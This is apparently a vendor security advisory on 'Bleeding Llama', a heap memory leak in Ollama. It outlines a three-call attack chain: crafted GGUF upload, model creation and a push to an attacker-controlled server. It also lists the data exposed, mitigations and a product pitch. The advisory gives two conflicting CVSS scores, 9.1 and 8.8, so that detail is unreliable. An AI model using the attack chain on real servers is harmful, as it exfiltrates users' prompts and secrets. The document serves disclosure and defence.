Bleeding Llama: A Critical Memory Leak in the World's Most Popular Local AI Platform
.png)
SECURITY ADVISORY
Bleeding Llama
Critical Unauthenticated Memory Leak in Ollama
CVE-2026-7482 • CVSS 9.1 CRITICAL
Vulnerability Unauthenticated Heap Memory Leak (Out-of-Bounds Read)
CVE ID CVE-2026-7482
CVSS Score 8.8 - CRITICAL
Affected Product Ollama (all versions prior to patch)
Attack Vector Remote, Unauthenticated - 3 API calls
Exposed Servers ~300,000 internet-facing instances
Discovered By Cyera Research
What We Found
Cyera's research team discovered a critical memory-leak vulnerability in Ollama, the world's most popular platform for running large language models (LLMs) locally.
With over 170,000 GitHub stars and 100 million Docker Hub downloads, Ollama is widely used across enterprises as a self-hosted AI inference engine.
The Vulnerability
The bug is an out-of-bounds heap read in Ollama's model quantization pipeline. When a user creates a model from an uploaded GGUF file (the standard format for storing LLM weights), Ollama reads tensor data from memory. A malicious actor can craft a GGUF file that declares a far larger tensor size than the actual data provided, forcing Ollama to read well beyond the intended buffer boundary - accessing sensitive data stored on the heap, such as system prompts, user messages, environment variables, and more
The attacker then leverages Ollama's built-in model push feature to exfiltrate the resulting file - complete with stolen heap data - to an attacker-controlled server.
The entire attack requires only three unauthenticated API calls:
Step 1
POST /api/blobs/sha256:…
Upload crafted GGUF file with inflated tensor shape
Step 2
POST /api/create
Trigger model creation - out-of-bounds read fills model file with heap data
Step 3
POST /api/push
Push model (and embedded heap data) to attacker-controlled server
What Is the Impact
Ollama launches with no authentication by default and listens on all network interfaces (0.0.0.0). With approximately 300,000 Ollama servers currently exposed on the public internet, this vulnerability is immediately and broadly exploitable - no credentials required.
What an Attacker Can Steal
Directly from AI Conversations
- User prompts and chat messages
- System prompts from all running models
- Conversation history across all users
From the Host Environment
- Environment variables (API keys, tokens, secrets)
- Proprietary code submitted to the AI
- Customer data and contracts reviewed via AI
Who Is Most at Risk
- Enterprises using Ollama as a shared internal AI assistant - every employee interaction is potentially exposed.
- Development teams using Claude Code or similar agentic tools routed through Ollama - tool outputs, file contents, and code are all in scope.
- Organizations in regulated industries (healthcare, finance, legal) where prompt content may include PII, PHI, or privileged information.
- Any deployment where Ollama is network-accessible without a firewall or authentication proxy in front of it.
What You Should Do
Organizations running Ollama should treat this as a Priority 1 incident and take the following actions immediately:
Immediate Actions (Within 24 Hours)
- 1. Patch Ollama: Apply the vendor-released fix. The patch validates tensor element counts against actual buffer sizes before any quantization loop executes.
- 2. Restrict network access: If patching is not immediately possible, block external access to Ollama's default port (11434) at the firewall level. Ollama should never be internet-facing without authentication.
- 3. Audit running instances: Use your asset inventory or tools like Shodan to identify any Ollama instances exposed on public IPs within your organization.
Short-Term Hardening (Within 1 Week)
- Enable authentication: Deploy an authentication proxy or API gateway in front of all Ollama instances. No Ollama API endpoint should be reachable without credentials.
- Rotate exposed secrets: If your Ollama server was internet-accessible, assume environment variables and secrets in memory may be compromised. Rotate API keys, tokens, and credentials immediately.
- Review agentic integrations: Audit any Claude Code, LangChain, or other tool integrations routing traffic through Ollama. All data passed through these tools should be treated as potentially disclosed.
- Network segmentation: Ensure Ollama servers are on isolated network segments with strict egress controls to prevent future exfiltration attempts.
How Cyera Can Help
Cyera's data security platform gives organizations the visibility and control needed to assess exposure from vulnerabilities like Bleeding Llama and prevent data exfiltration across AI workloads.
Data Discovery & Classification
Identify sensitive data flows into AI systems - including what employees are submitting to Ollama. Cyera continuously maps where PII, credentials, proprietary code, and regulated data exist across your environment so you know exactly what was at risk.
AI Risk Posture Assessment
Assess your organization's exposure to AI infrastructure vulnerabilities. Cyera can identify unauthenticated or misconfigured AI inference endpoints, flag internet-facing Ollama instances, and provide a risk-prioritized remediation roadmap.
Data Loss Prevention for AI Workloads
Enforce policies that prevent sensitive data from being submitted to AI endpoints without authorization. Cyera's DLP capabilities extend to agentic pipelines and developer tooling, including integrations like Claude Code, ensuring sensitive outputs cannot be silently exfiltrated.
Threat Detection & Incident Response
Detect anomalous access patterns and data movement consistent with exploitation of vulnerabilities like CVE-2026-7482. Cyera's threat intelligence capabilities help security teams investigate potential past exposure and understand the blast radius of a breach.
.avif)
.png)

